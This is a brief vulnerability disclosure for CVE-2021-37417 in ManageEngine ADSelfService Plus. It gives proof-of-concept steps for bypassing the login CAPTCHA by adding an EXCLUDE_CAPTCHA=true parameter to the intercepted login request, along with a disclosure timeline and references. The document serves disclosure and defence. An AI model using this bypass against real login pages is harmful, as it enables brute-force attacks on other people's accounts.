CVE-2021-37417

Description

Users can bypass captcha check in login form using EXCLUDE_CAPTCHA parameter, which could lead to brute-force attacks.

Proof-of-concept

1. Enable "Show CAPTCHA on Login Page every time" option in ADSSP settings.
2. Set up intercepting proxy (e.g. Burp Suite).
3. Go to login page, enter valid username and password. In CAPTCHA field enter any value.
4. Intercept HTTP POST request sent to /j_security_check endpoint. Add EXCLUDE_CAPTCHA=true parameter to request body.
5. Send modified request to the server. User will be logged in despite providing wrong CAPTCHA value.

Timeline

• 17-03-2021 - Vulnerability reported to vendor
• 18-03-2021 - First response from vendor
• 08-05-2021 - Fixed version release
• 30-08-2021 - Public disclosure
• 21-02-2022 - PoC release

References

https://www.manageengine.com/products/self-service-password/release-notes.html
https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6104-released-with-an-important-security-fixes
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-37417